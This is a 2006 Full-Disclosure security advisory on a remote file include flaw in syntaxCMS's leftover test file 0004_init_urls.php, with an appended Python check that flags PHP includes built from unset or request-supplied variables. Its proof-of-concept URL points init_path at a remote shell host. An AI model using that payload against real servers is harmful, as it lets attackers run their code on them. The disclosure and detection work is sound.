Source: securityvulns, SECURITYVULNS:DOC:14407
Published: Sep 25, 2006 - 12:00 a.m.

[Full-disclosure] Remote File Include in syntaxCMS

Remote File Include in syntaxCMS

Vulnerable File:

0004_init_urls.php

Vulnerable Code:

<?php
include_once( $init_path . '/init.urls.php' );
?>

PoC:

http://www.poweredbysyntaxcmssite.com/admin/testing/tests/0004_init_urls.php?init_path=http://YourShell?&

Solution:

Remove this file. It is not needed; it is only used for tests.


Found by MoHaJaLi

Greetz to Eddy_BAck0o



Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
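
Added example, not part of the original advisory or the syntaxCMS code: the quoted file builds its include path from $init_path without ever setting it, which is why the init_path request parameter can supply the value. This heuristic Python check flags include/require statements whose path uses a variable that is never assigned earlier in the same file, or a request superglobal directly. The function names and the second sample are hypothetical, and the check does no data-flow tracking or comment stripping.

```python
import re

# include/require[_once] up to the closing ';'. The lookbehind skips
# identifiers such as $include or my_include that merely contain the keyword.
INCLUDE_RE = re.compile(
    r'(?<![\$\w])(?:include|require)(?:_once)?\b\s*\(?(?P<expr>[^;]*);',
    re.IGNORECASE)
VAR_RE = re.compile(r'\$([A-Za-z_]\w*)')
# Request-controlled superglobals: a path built from these is tainted outright.
SUPERGLOBALS = {'_GET', '_POST', '_REQUEST', '_COOKIE', '_FILES', '_SERVER'}


def assigned_before(src, name, pos):
    """True if `$name = ...` (not ==, not =>) appears before offset pos."""
    pat = re.compile(r'\$' + re.escape(name) + r'\s*=(?![=>])')
    return pat.search(src, 0, pos) is not None


def audit_includes(src):
    """Return (line, variable, reason) for each risky include path variable."""
    findings = []
    for m in INCLUDE_RE.finditer(src):
        line = src.count('\n', 0, m.start()) + 1
        for name in VAR_RE.findall(m.group('expr')):
            if name in SUPERGLOBALS:
                findings.append((line, name, 'request data in include path'))
            elif not assigned_before(src, name, m.start()):
                findings.append((line, name, 'never assigned in this file'))
    return findings


# Constructed inputs: the first is the three-line file quoted in the advisory,
# the second is a hypothetical variant that sets the path itself.
ADVISORY_FILE = "<?php\ninclude_once( $init_path . '/init.urls.php' );\n?>\n"
FIXED_VARIANT = ("<?php\n$init_path = dirname(__FILE__) . '/../..';\n"
                 "include_once( $init_path . '/init.urls.php' );\n?>\n")

if __name__ == '__main__':
    for label, src in (('advisory file', ADVISORY_FILE),
                       ('fixed variant', FIXED_VARIANT)):
        print(label, audit_includes(src))
```

Run over a checkout, it gives a quick list of leftover test or helper scripts that deserve the same treatment the advisory recommends for 0004_init_urls.php.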